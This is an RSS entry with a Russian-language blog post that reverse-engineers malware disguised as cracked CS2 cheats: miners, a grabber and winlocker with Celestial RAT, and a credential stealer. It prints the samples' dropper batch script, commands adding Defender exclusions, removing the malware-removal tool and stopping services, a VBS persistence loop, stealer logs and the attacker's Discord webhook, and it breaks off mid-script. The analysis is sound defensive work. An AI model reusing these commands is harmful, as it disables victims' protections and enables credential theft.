<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>q</title><generator>teletype.in</generator><description><![CDATA[q]]></description><image><url>https://img4.teletype.in/files/7e/85/7e8555ff-80f0-4b3b-810a-adcff378d87a.png</url><title>q</title><link>https://teletype.in/@metasteall</link></image><link>https://teletype.in/@metasteall?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/metasteall?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/metasteall?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Wed, 13 May 2026 21:17:45 GMT</pubDate><lastBuildDate>Wed, 13 May 2026 21:17:45 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@metasteall/VirusChecks</guid><link>https://teletype.in/@metasteall/VirusChecks?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall</link><comments>https://teletype.in/@metasteall/VirusChecks?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=metasteall#comments</comments><dc:creator>metasteall</dc:creator><title>ИЗУЧАЕМ ВИРУСЫ ЧЕРЕЗ КРЯКИ</title><pubDate>Sun, 13 Oct 2024 19:03:57 GMT</pubDate><media:content medium="image" url="https://img1.teletype.in/files/86/28/86284054-200b-4832-87e1-4c4fc6482340.png"></media:content><category>reverse</category><description><![CDATA[<img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F58QKxdm%2FPasted-image-20240402185118.png&amp;hash=9b541cf8f5075dc82ce103173ce44886"></img>Весенний шалом, давно не виделись, и т.к. не осталось прикольных идей для статьи, то добро пожаловать на рофло-статью.
Целью сегодняшней статьи является реверс-инжиниринг самых разнообразных вирусов, которые распространяются под видом кряка читов на CS:GO/CS2.]]></description><content:encoded><![CDATA[
  <p id="Ww82">Весенний шалом, давно не виделись, и т.к. не осталось прикольных идей для статьи, то добро пожаловать на рофло-статью.<br />Целью сегодняшней статьи является реверс-инжиниринг самых разнообразных вирусов, которые распространяются под видом кряка читов на CS:GO/CS2.</p>
  <p id="H9lP"><strong>Проблема на YouTube и Telegram</strong></p>
  <p id="Onja">Злоумышленники давно уже маскируют вредоносное ПО под видом читов для игр, эта практика началась задолго до CS:GO, еще во времена игр ВКонтакте. Сейчас же они всё так же распространяются, но теперь ещё и под видом самого кряка чита, всё это дело публикуется на платформе YouTube. Они вписывают довольно привлекательную смесь фраз в название ролика, а именно: <strong>&quot;Название популярного чита + Crack&quot;</strong>, чтобы заманивать наивных пользователей.</p>
  <p id="fwIW">Для личного удобства перед разбором я буду писать небольшую информацию об авторах вредоносного ПО, пример: [пациент и его номер] - [уровень риска вредоносного ПО].</p>
  <p id="AwV6">Уровни риска и что под эту категорию может попасть:<br />1. <strong>Неприятное говно</strong> (Низкий опасный потенциал) - потенциально нежелательные программы (PUP), которые не причиняют прямого вреда, но могут быть бесполезны или навязчивы.<br />2. <strong>Опасное говно</strong> (Средний опасный потенциал) - вредоносы, собирающие конфиденциальную информацию без ведома пользователя.<br />3. <strong>Деструктивное говно</strong> (Высокий опасный потенциал) - удаление важных файлов, отключение компонентов ОС, невозможность загрузки операционной системы, синий экран, зашифрованные данные, ратники</p>
  <p id="40XV"><strong>Разбор пациентов</strong></p>
  <p id="yLa1"><strong>Пациент 1 - Опасное говно (Средний опасный потенциал)</strong></p>
  <p id="qOAb">Наш первый пациент является очень хорошим примером того самого душевнобольного, который умудряется делать все платные читы бесплатными, добавляя туда свой подвох, о котором не сообщит вам, распространяя это всё на YouTube (<a href="https://www.blast.hk/redirect/aHR0cDovL3d3dy55b3V0dWJlLmNvbS9AbW90b2JveTkwMA" target="_blank">www.youtube.com/@motoboy900</a>) и на свой Telegram-канал (<a href="https://www.blast.hk/redirect/aHR0cHM6Ly90Lm1lL2NzMl9jaGVhdDI" target="_blank">https://t.me/cs2_cheat2</a>).</p>
  <p id="obS1">Также пациент включил смекалку и поместил малварь в 7Zip пакер (<a href="https://www.blast.hk/redirect/aHR0cHM6Ly91c2J0b3IucnUvdmlld3RvcGljLnBocD90PTc5OA" target="_blank">https://usbtor.ru/viewtopic.php?t=798</a>), что позволило ему обойти детекты на virustotal.com. На рисунке представлены отношения между файлами, обнаруженными при запуске.</p>
  <figure id="Pgyy" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F58QKxdm%2FPasted-image-20240402185118.png&hash=9b541cf8f5075dc82ce103173ce44886" width="1002" />
  </figure>
  <p id="tZGE">Теперь я распишу за что отвечает каждый файл, представленный на иллюстрации, но более подробно.</p>
  <p id="NZH6">1. <strong>Cheat Installer </strong>- главный файл, который распаковывает остальные файлы в папку AppData/Local/Temp/main, и затем запускает файл main.bat<br />2. <strong>AntiAV.data</strong> (<a href="https://github.com/hXR16F/AntiAV/blob/master/AntiAV.bat" target="_blank">AntiAV/AntiAV.bat at master · hXR16F/AntiAV (github.com)</a>) - изначально представляет собою batch-скрипт, который создаёт main.bat и помещает в него код, параллельно добавляя джанк-код и зашифровывает файл.<br />3. <strong>main.bat </strong>- &quot;мозг&quot; операции по запуску малваря, чей код представлен ниже:</p>
  <p id="mD4w">Код:</p>
  <pre data-lang="" id="veSw">mode 65,10
title g3g34g34g34g43 (34g34g45h6hj56j56j)

md extracted

ren file.bin file.zip
call 7z.exe e file.zip -p13917279271825026492155405390 -oextracted

for /l %%i in (11,-1,1) do
(call 7z.exe e extracted/file_%%i.zip -oextracted

ren file.zip file.bin

cd extracted
move &quot;Installer.exe&quot; ../

cd..
rd /s /q extracted

attrib +H &quot;Installer.exe&quot;
start &quot;&quot; &quot;Installer.exe&quot;
echo Launched &#x27;Installer.exe&#x27;.
pausedel /f /q &quot;Installer.exe&quot;</pre>
  <p id="sNuO">Сам алгоритм довольно простой, вначале file.bin переименовывается в file.zip, и начинается процесс распаковки, используя ключ для расшифровки <strong>&quot;13917279271825026492155405390&quot;</strong>. Структура file.zip представляют собой матрешечную вложенность, именно по этой причине здесь используется цикл для распаковки.</p>
  <p id="8pYz">После распаковки file.zip обратно переименовывается в file.bin, а Installer.exe получает скрытый атрибут, делая его невидимым в стандартном представлении файловой системы, затем процесс запускается.</p>
  <p id="Qwpx">4. <strong>Installer.exe</strong> - вирус, при первом запуске он только инициализирует себя и отключает сервисы.</p>
  <p id="krVJ">Первым, что делает вирус, так это выполняет команду в powershell:</p>
  <p id="Wg3H">Код:</p>
  <pre data-lang="" id="4xkR">Add-MpReference -ExclusionPath @($env;UserProfile, $env:ProgramData) -ExclusionExtension &#x27;.exe&#x27; -Force</pre>
  <p id="pYqF">Эта команда добавляет два исключения в Защитник Windows:</p>
  <ul id="9Gn0">
    <li id="6YQV"><strong>Путь:</strong> <code>%UserProfile%</code></li>
    <li id="fhFs"><strong>Путь:</strong> <code>%ProgramData%</code></li>
    <li id="JD1h"><strong>Расширение:</strong> <code>.exe</code></li>
  </ul>
  <p id="P58o">Затем наглым образом удаляет обновление KB90830:</p>
  <p id="nK6E">Код:</p>
  <pre data-lang="" id="ckDO">/c wusa /uninstall /kb:890830 /quiet /norestart</pre>
  <p id="0aQS">Малварь его удаляет не просто так, дело в том, что обновление 90830 связано с установкой средства удаления вредоносного ПО (Windows Malicious Software Removal Tool)</p>
  <p id="AfO4">Ко всему прочему он останавливает важные службы<br />Код:</p>
  <pre data-lang="" id="UoVI">sc stop UsoSvc - Служба обновления Windows
sc stop WaaSMedicSvc - Служба Центра обновления Windows
sc stop wuauserv - Служба автоматического обновления Windows
sc stop bits - Служба фоновой интеллектуальной передачи данных
sc stop dosvc - Служба DistributedCOM
sc stop eventlog - Служба журнала событий</pre>
  <p id="8wzC">Похоже, что дело мы имеем с Crypto Silent Miner, на то указывают строки с остановкой служб: <a href="https://github.com/UnamSanctam/SilentCryptoMiner/blob/c61e842d5ec04e2493a83f54f096ba2f3b95687d/SilentCryptoMiner/Resources/Code/miner.cpp#L121" target="_blank">https://github.com/UnamSanctam/Sile...lentCryptoMiner/Resources/Code/miner.cpp#L121</a></p>
  <p id="z8ma">Т.к. в реверсе open-source нет никакого смысла, то и продолжать разбирать дальше семпл не стал, но прикола ради я почекал реквест в Pastebin)0 <a href="https://www.blast.hk/redirect/aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25HOE1kUktT" target="_blank">pastebin.com/raw/nG8MdRKS</a></p>
  <figure id="GOd8" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2Fh21mCdP%2FPasted-image-20240401212819.png&hash=a401032c80d3d04051082d095888dc84" width="895" />
  </figure>
  <p id="3MFp"><strong>Пациент 2 - Опасное говно (Средний опасный потенциал)</strong></p>
  <p id="rlYQ">Следующий пациент с ником lexoff очень хорошо раскачал свой Telegram-канал (t.me/lpsopg), где постит бесплатные читы, и чужие кряки, к которым он сам не имеет никакого отношения. Тем не менее, ему хватает наглости их склеивать со своим малварем и публиковать в открытый доступ.</p>
  <p id="DfKd">Разберем его пост с кряком Primordial, к которому опять же, он не имеет никакого отношения, но не стоит удивляться, если пост с примордом пропадет.</p>
  <figure id="ABY3" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FT0BzGQ7%2FPasted-image-20240402213539.png&hash=849ba2b52d5439456506e9575ea4700d" width="1048" />
  </figure>
  <p id="DWkT">Лоадер, как бы это неудивительно не звучало, находится под протектором <strong>Enigma </strong>с полным пресетом защиты, он проверяет наличие дебаггера, виртуальной машины и целостность (даже имя оригинальное сверяет).</p>
  <p id="fimB">Зачем и что скрывать такому честному человеку? Непонятно, но было бы интересно услышать ответ на это от самого автора канала. Теперь обсудим саму схему работы лоадера, хотя правильнее назвать его дроппером.</p>
  <p id="0c6v">Используя песочницу, я обнаружил, что его лоадер создал два исполняемых файла, и затем закрылся.<br />Если раньше старый лоадер просто дропал Vac Bypass.exe и майнер, то сейчас &quot;новый&quot; лоадер слегка поменял контент, который дроппает пользователю</p>
  <figure id="8RNI" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FhgK3YXX%2FPasted-image-20240402214141.png&hash=5ff0a4b0c1d596a173ac142e6d7efaa1" width="609" />
  </figure>
  <p id="76a5">Для его самых избранных фанатов: архив был скачан прямиком из его телеграм-канала (а именно этот пост: <a href="https://www.blast.hk/redirect/aHR0cHM6Ly90Lm1lL2xwc29wZy8yOTA" target="_blank">https://t.me/lpsopg/290</a>)</p>
  <p id="1aKq">Разберем роль каждого из процессов<br />1. <strong>cli_gui.exe</strong> - Обыкновенный лоадер который весит совсем ничего, имеет зачем-то примитивную проверку на отладчик и в целом играет роль LLA инжектора с патчем NtOpenFile.</p>
  <p id="DyM2">2. <strong>updater.exe</strong> - Майнер, который представлен как Microsoft Edge Updater с иконкой браузера и подписью Microsoft.</p>
  <p id="rwQS"><strong>Updater.exe</strong> тоже завершает те же самые службы, что и майнер предыдущего пациента, не трудно догадаться что оба пациента используют одну и ту же пасту, но с разными настройками.</p>
  <p id="24TI">Например, майнер второго пациента использует технику Process Hollowing (<a href="https://www.blast.hk/redirect/aHR0cHM6Ly93d3cudGVjaHRhcmdldC5jb20vd2hhdGlzL2RlZmluaXRpb24vcHJvY2Vzcy1ob2xsb3dpbmc" target="_blank">What is process hollowing? (techtarget.com)</a>) в замороженный системный процесс dialer.exe, и уже там майнит.</p>
  <p id="Q343"><strong>(Забавный факт, но на некоторых LTSC-сборках нет такого системного процесса, и майнер, не зная этого, пытается создать процесс, и с треском проваливается.)</strong></p>
  <p id="n8LG">Отдельного внимания стоит то, как именно пациент криптит строки, скрины взяты из его старого лоадера с кряком Inuria:</p>
  <figure id="L7lN" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F31GCsSR%2FPasted-image-20240407210734.png&hash=aa1c78ed5f3c7a5798655cf33a8dbdf5" width="622" />
  </figure>
  <p id="NvhS">Он палит аргумент с голой строкой в функции, которая её криптит, и затем после полученной зашифрованной строки начинает сразу же её дексорить))00 Шифрование 10 из 10.</p>
  <figure id="FCBF" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F0yWNL1P%2FPasted-image-20240407210656.png&hash=b7da8f1f45b68c138775202dfc493ba8" width="1109" />
  </figure>
  <p id="ovQK">К сожалению, админ этого канала отказался признавать наличие малваря в своих публикациях и не захотел вести со мной адекватный диалог, поэтому рофлан поминки, идём дальше.</p>
  <p id="opeH">Надеемся, что админ канала исправится и прекратит постить говно для своей аудитории! (Не перестанет, схавают же)</p>
  <p id="P8Dg">Обновлено:<br />Появился пост где он опубликовал склеенный Luno чит со своим майнером (<a href="https://www.blast.hk/redirect/aHR0cHM6Ly90Lm1lL2xwc29wZy8yOTE" target="_blank">https://t.me/lpsopg/291</a>), разницы с прошлым лоадером приморда буквально 0. Вот что пациент ответил на предъявы с детектами:</p>
  <figure id="lIPR" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FggSnmnt%2FPasted-image-20240407223730.png&hash=b975ba19a82e3fa638aee2f03d2c8e0c" width="540" />
  </figure>
  <p id="NELo">Лоадер оригинального Luno Free не превышает 1мб, а файл, который предоставляет пациент весит аж 11мб</p>
  <figure id="kCtt" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FwLrk7TG%2FPasted-image-20240407224347.png&hash=4ed45f6e6a75b5bc0967bfcb0cb7b048" width="1467" />
  </figure>
  <p id="UaML"><strong>Пациент 3 - Деструктивное говно (Высокий опасный потенциал)</strong></p>
  <p id="F8GE">Теперь перейдем к более серьезным малварям. На очереди у нас человек, сумевший крякнуть миднайт, и выложить готовый лоадер, который выглядит 1 в 1 как оригинальный лоадер.</p>
  <figure id="IRc8" class="m_custom">
    <iframe src="https://www.youtube.com/embed/LZPIPn3RnQg?autoplay=0&loop=0&mute=0"></iframe>
  </figure>
  <p id="QNX7">Оказалось, что файл этот был написан на C#, и накрыт видоизменённым обфускатором Confuser Core 1.5.0, что доставило мне не мало проблем позже при деобфускации файла.</p>
  <p id="BtST"><strong>Первичный анализ</strong></p>
  <p id="ZTfd">Во время статического анализа я заметил, что de4dot не смог распознать этот обфускатор, поэтому пришлось смотреть вручную листинг в dnSpy</p>
  <figure id="HBIY" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FgFJ0wwc%2FPasted-image-20240404115550.png&hash=a4733de71a487d5713f5d3d4999f63d8" width="591" />
  </figure>
  <p id="tTVi">Далее я полистал названия классов и обнаружил кучу пустых методов, было ясно, что это слегка видоизмененный Confuser.Core, например то же шифрование строк поменялось в лучшую сторону, да так, что ни одна паблик тулза не хотела фиксить это.</p>
  <figure id="XNuv" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F7vsKnc0%2FPasted-image-20240404125313.png&hash=93fb7624e11349b2828f8f693df61eb0" width="462" />
  </figure>
  <p id="y8n4"><strong>Убираем AntiTamper</strong></p>
  <p id="DqIm">Чтобы была возможность трассировать уже деобфусцированный код, нам нужно снять анти-тампер с файла, который инициализируется первым в программе, если его пропатчить до того, как он вызовется, то в последующем программа просто крашнет.</p>
  <figure id="4duM" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FtBCchmJ%2FPasted-image-20240404115739.png&hash=5e52604acd4dd27a4ce18ecbfcce12b4" width="1446" />
  </figure>
  <p id="iA18">Сама цель АнтиТампера распределена на несколько этапов, а именно:<br />1. <strong>Поиск зашифрованного блока данных:</strong> АнтиТампер сканирует заголовки и секции файла, чтобы найти нужный ему блок данных, который изначально зашифрован в файле.<br />2. <strong>Дешифрование этих данных:</strong> Найденный блок данных дешифруется используя CryptoStream и XOR.<br />3. <strong>Проверка целостности данных:</strong> Вычисляется MD5-хэш уже дешифрованных данных и затем этот хэш сравнивается с контрольной суммой, вшитой в модуль.<br />4. <strong>Запись дешифрованных данных в память:</strong> Если хэши совпадают, дешифрованные данные записываются обратно в память модуля.</p>
  <p id="oEQz">Избавиться от анти-тампера оказалось проще простого, во время работы программы проверка целостности ни разу не будет вызвана, это означает, что можно затереть вызов инициализации анти-тампера сразу же после его выполнения и сдампить модуль.</p>
  <p id="1V51"><strong>Слабое о</strong>бнаружение VM/SandBox</p>
  <p id="t75a">После того, как я привел файл в более читабельный файл и избавился от антитампера, я принялся анализировать работу малваря.</p>
  <p id="tOo6">Для начала, он проверяет, находится ли жертва под виртуальной машиной, в частности под VirtualBOX, он обращается к WMIC (<strong>Select * from Win32_ComputerSystem</strong>), в полученном результате он пытается найти слово &#x27;virtual&#x27;. затем после удачной проверки он обращается снова к WMIC, забирая имя дисплея, и в последующем пытаясь найти слово &#x27;basic&#x27; в нём.</p>
  <p id="i6WL">И финальная проверка в методе заключается в проверке кол-во кэш-памяти, для того чтобы функция вернула false, она должна найти больше двух кэш-памяти.</p>
  <figure id="oYSG" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F4RHG86d%2FPasted-image-20240404205806.png&hash=d610fa6826b9e72905c9089293c4e8ee" width="1476" />
  </figure>
  <p id="zZdQ">Помимо этого, были еще различные методы проверки на наличие песочницы, такие как проверка на наличие модуля SbieDll.dll, что довольно неактуально на 2024 год.</p>
  <p id="zltg"><strong>Инициализация малваря</strong></p>
  <p id="CgBH">Файл создаёт директорию WindowdDebug со скрытым атрибутом, записывая туда файл с именем svchost.exe.</p>
  <p id="4q7K">Перед его запуском, он записывает данные в реестр по пути <strong>{HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows}</strong> со строкой: <strong>Load &quot;C:\\Windows\\WindowdDebug\\svchost.exe&quot;</strong></p>
  <p id="IHbD">Когда все файлы подготовлены, исполняемый файл удаляет себя batch-скриптом, который он подготовил заранее:<br />Код:</p>
  <pre data-lang="" id="ZA58">chcp 65001
timeout 2 &gt; NUL
DEL &quot;C:\Users\57\Desktop\123.exe&quot; /f /q
CD C:\Users\57\AppData\Local\Temp\
DEL &quot;tmpBE3.tmp.bat&quot; /f /q</pre>
  <p id="hHKP"><strong>Реестр</strong></p>
  <p id="Ef52">Перезаписанный исполняемый файл повторяет те же самые процедуры, что и его предшественник, с небольшими изменениями, именно тут он начинает полностью функционировать.</p>
  <p id="1bZ4">Исполняемый файл изменяет ветвь реестра <strong>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System</strong>, устанавливая значения <strong><code>DisableTaskMgr</code></strong> в 1, а <strong><code>EnableLUA</code></strong> в 0. Это отключает диспетчер задач, что затрудняет рядовым пользователям удалить вредонос. Кроме того, оно отключает уведомления контроля учетных записей (UAC), которые предупреждают пользователей о попытках исполняемых файлов установить программное обеспечение или внести изменения в систему.</p>
  <p id="L7LX">Под раздачу попали и <strong>FirewallEnable</strong> с <strong>DisableAntiSpyware</strong>, выключая брандмауэр и защитник Windows.</p>
  <p id="EjJR"><strong>Авто-поднятие малваря</strong></p>
  <p id="p9dm">Исполняемый файл создаёт в папке Temp скрипт script.vbs, и заполняет его кодом:</p>
  <p id="42Yx">Код:</p>
  <pre data-lang="" id="aGxm">On Error Resume Next
Do while true
CreateObject(&quot;WScript.Shell&quot;).Exec &quot;C:\Windows\WindowdDebug\svchost.exe&quot;
WScript.Sleep(10000)
Loop</pre>
  <p id="FJkP">Скрипт автоматически запускает исполняемый файл каждые десять секунд, если обнаруживается копия запущенного процесса, она завершается.</p>
  <figure id="VAfJ" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FCz7R8Fh%2FPasted-image-20240404220443.png&hash=68f5315f7d67608033ff786cb86417ec" width="1347" />
  </figure>
  <p id="FsWP">Сам вирус тоже отслеживает работу wscript с помощью отдельного потока, чтобы предотвратить его закрытие.</p>
  <p id="CjmD"><strong>Winlocker + CelestialRAT</strong></p>
  <p id="hkoQ">Оказалось, что ко всему прочему, тут был и <strong>Winlocker</strong>, но он по неизвестной мне причине отказывался появляться на экране, несмотря на то, что инициализация формы (инициализация кнопок, текста, панелей) проходила, и мимо пролетали такие строки, как <strong>&quot;Windows Заблокирован&quot;, &quot;Attempts&quot;, &quot;Unlock Windows&quot;</strong>:</p>
  <figure id="dCEl" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2Fk3t6vYP%2FPasted-image-20240404233102.png&hash=ba18d0dafbffc20eb850e82616e0381b" width="1233" />
  </figure>
  <p id="K099">В дальнейшем, анализ показал наличие не только наличие граббера и винлокера, но и полноценного ратника Celestial RAT, о чем свидетельствует использование характерного имени файла при создании архива, а сам метод создания показан на скриншоте:</p>
  <figure id="OABg" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F5FrMhsp%2FPasted-image-20240404224756.png&hash=dfc32e7f8c44748765d874f1445c9a60" width="1087" />
  </figure>
  <p id="qaaG">При первой отправке логов граббер старается унести важные файлы, которые так или иначе светят слово &#x27;license&#x27;, так он забрал файлы лицензии de4dot.</p>
  <p id="Wlph">Вот как выглядит первый лог:<br />Код:</p>
  <pre data-lang="" id="vdvk">ZipFile:
Comment:
CelestialRAT - log (RU)

/ System \\
Date: 2024-04-04 10:41:59
ComputerName: KOMPUTER
UserName: 57
Language: ru-RU

/ Hardware \\
GPU: Penis
CPU: AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor           
RAM Amount: 8191MB
Screen Metrics: 3238x1280
uses ZIP64: False
disk with CD: 0
CD offset: 0x00000000</pre>
  <p id="QJqP">Затем граббер начинает проверять наличие важных сессий у зараженной жертвы, такие как телеграм сессии, дискорд-токен, и пароли, куки и отправляет уже второй лог, используя веб-хук дискорда:<br />Код:</p>
  <pre data-lang="" id="5bPj">&quot;Celestial RAT / A New log arrived.
Client time: 2024-04-04 10:41:59
Country: RU (-)
UserName: 57
MachineName: KOMPUTER
GPU: Penis
CPU: AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor              ; AMD Ryzen 5 3600 6-Core Processor           
RAM: 8191MB
System: Windows 10 Enterprise LTSC 2021 64-bit (OS Build 19044)
Screen: 3238x1280
-------------------------------------------------
Passwords : 0
Cookies : 0
Autofills : 0
Discord tokens : 0
Wallets : 0
Filezilla hosts : 0
Telegram sessions : 0
-------------------------------------------------Password:-&quot;</pre>
  <p id="lBIG">Сам метод отправки через веб-хук выглядит так:</p>
  <figure id="d3n9" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FtZLCt2v%2FPasted-image-20240404230607.png&hash=7f1891dabaf6c60ae6195338f063b56e" width="1077" />
  </figure>
  <p id="bmZj">А, ну и по классике сам вебхук того, кто распространяет вредонос - <a href="https://www.blast.hk/redirect/aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTIxODc0MjY3NTI5ODE4OTQ5My9MR1A2TktlYlJqazQ1Q3J1UENFTTZXaFVRLXVBQmt2WC1qWlM5TFYxczRLbDVCbUllU3h0dlNSZnozVUhESU1yeGNlcw" target="_blank"><strong>&quot;https://discord.com/api/webhooks/1218742675298189493/LGP6NKebRjk45CruPCEM6WhUQ-uABkvX-jZS9LV1s4Kl5BmIeSxtvSRfz3UHDIMrxces&quot;</strong></a></p>
  <p id="eh94"><strong>Пациент 4 - Неприятное говно (Низкий опасный потенциал)</strong></p>
  <figure id="csHh" class="m_custom">
    <iframe src="https://www.youtube.com/embed/erbTdL0OmnQ?autoplay=0&loop=0&mute=0"></iframe>
  </figure>
  <p id="spbz">Четвёртый пациент на своём ютуб-канале публикует стиллер, написанный на C++ и сразу скажу, что исполняемый файл для хранения информации о пользователе использует локальную базу данных - <strong>sqlite3 </strong>и архивирует все это дело через <strong>ZLib</strong>, и всё это подносится, опять же, под видом крякнутого миднайта.</p>
  <p id="vy8N">Исполняемый файл никак не пытается защитить себя от обнаружения, он не запакован чем-либо, не пытается обнаружить виртуальную машину или отладчик, не добавляется в автозагрузку. ничего кроме шифрования строк оно не использует, но опять же, даже при статическом анализе в дизассемблере всё становится очевидным.</p>
  <p id="7iPq"><strong>Первый запуск</strong></p>
  <p id="NYUl">Для начала после вызова main функции, исполняемый файл создает мьютекс и ждёт пока пользователь нажмёт кнопку <strong>Escape</strong>. После нажатия вирус получает путь до папки Temp, чтобы хранить там базу данных. Затем начинает воровать у пользователя данные.</p>
  <p id="rmuD">Если говорить о том что именно он ворует, то тут дефолтный набор стиллера:</p>
  <ul id="mBC7">
    <li id="ACbP"><strong>Скриншот </strong>- Делается первым же делом после создания мьютекса и прожатия клавиши, сохраняя название файла как &#x27;Desktop.jpg&#x27;.</li>
    <li id="lHd0"><strong>Steam </strong>- Обращается в реестр по пути &quot;Software\Valve\Steam\AutoLoginUser&quot;, если такой путь есть и удается прочитать имя, то следующим делом он получает путь до папки стима, проверяет наличие таких файлов, как: &quot;loginusers.vdf&quot;, &quot;config.vdf&quot;, &quot;ssfn&quot;, при наличии копирует их к себе.</li>
    <li id="ga4H"><strong>FileZilla </strong>- Проверяет наличие папки с таким названием, в случае наличия читает файл recentserver.xml и сохраняет к себе поля &quot;Host&quot;, &quot;User&quot;, &quot;Pass&quot;, &quot;Port&quot;.</li>
    <li id="PwTf"><strong>VPN </strong>- Проверят наличие папки NordVPN и OpenVPN, если нашел NordVPN, то читает и копирует user.config &quot;//setting[@name=&#x27;Username&#x27;]/value&quot;, &quot;//setting[@name=&#x27;Password&#x27;]/value&quot;. Если нашел OpenVPN, то читает файлы &quot;.ovpn&quot;.</li>
    <li id="srp6"><strong>Discord</strong> - Читает файл по пути &quot;discord/Local Storage/leveldb&quot;, и в нем ищет упоминание слова &quot;token&quot;.</li>
    <li id="b38I"><strong>Telegram </strong>- Копирует всё содержимое из Telegram Desktop/tdata к себе.</li>
    <li id="xExn"><strong>Desktop Files</strong> - Ищет на рабочем столе расширение &quot;lua&quot;, &quot;cpp&quot;, &quot;h&quot;, &quot;hpp&quot;, &quot;doc&quot;, &quot;docx&quot; и копирует их к себе.</li>
  </ul>
  <figure id="Hy8k" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2F5BKvMdM%2FPasted-image-20240406225754.png&hash=a6dab2e6c747d66276f883ed254b511c" width="655" />
  </figure>
  <p id="rCfZ"><strong>Непредусмотрительность разработчикаПо сути, анализировать то особо нечего, но есть одна неприятная бага для разработчика.</strong></p>
  <p id="WK5L">В исполняемом файле есть функция, назовём её <strong>&quot;getFilesFromDirectories&quot;</strong>, она представляет собой алгоритм поиска файлов в указанных директориях, включая все вложенные директории. Для этого она использует рекурсивный подход, т.е. когда функция находит директорию, она вызывает сама себя, передавая новый путь к директории в качестве аргумента. Это позволяет ей проходить по всей вложенной иерархии директорий и искать файлы во всех из них.</p>
  <p id="ua8d">Причина по которой этому вирусу была выдана низкая опасная потенциальность взаимосвязана с этой функцией. Дело в том, что функция вне своей рекурсии вызывается два раза, для поиска файлов в папке <strong>Roaming </strong>и <strong>Local</strong>.</p>
  <p id="Iaut">Первый вызов обходится без проблем, но вызов второй функции буквально останавливает программу, причем буквально, в моем случае функция вызвала себя 205 раз, и на 206 полностью перестала функционировать, трассировка же просто показывала, что сейчас <strong>EIP </strong>находится на одном из экспортов ntdll функции, и выходом из ситуация был только перезапуск вируса.</p>
  <p id="OiRx"><strong>Из-за этой проблемы, вирус не в состоянии был отправить логи на сервер.</strong></p>
  <p id="d1Bc">Функция <strong>&quot;getFilesFromDirectories&quot;</strong> является лишь верхушкой айсберга, когда я снимал трассировку, я заметил, что последними вызываемыми функциями были <strong>OpenProcess </strong>и <strong>NtQueryObject</strong>.</p>
  <p id="vXCm">Функция действительно имеет отдельный метод для этого, назовём его <strong>getMemoryCookies</strong>, по псевдо этой функции можно понять, что она проходится по всем процессам, и пытается найти в их памяти упоминание куки-файлов, вызывая функцию <strong>isNetworkCookieObject</strong>.</p>
  <figure id="FHH3" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FS32B009%2FPasted-image-20240407164038.png&hash=9f066a18e8e59de3db9b5b4f169b9064" width="1161" />
  </figure>
  <p id="TYow">Псевдо <strong>isNetworkCookieObject</strong>:</p>
  <figure id="kwKy" class="m_original">
    <img src="https://www.blast.hk/proxy.php?image=https%3A%2F%2Fi.ibb.co%2FGTnsgzk%2FPasted-image-20240407164517.png&hash=86465d4e00cc193eab3b85e535fa51a9" width="1102" />
  </figure>
  <p id="Vujy">И так как <strong>getMemoryCookies </strong>в цикле проходится по всем процессам, то нужно было понять, на каком процессе именно происходит зависание программы. Во время трассировки я обнаружил, что во время зависания в <strong>OpenProcess </strong>лежал процесс айди моего браузера., но я не успел узнать на какой функции именно произошло зависание, поэтому я накидал лёгкий скрипт, который проверял процесс айди моего браузера с аргументом в <strong>OpenProcess</strong>:<br />Perl:</p>
  <pre data-lang="perl" id="uDId">$handleCounter = 0
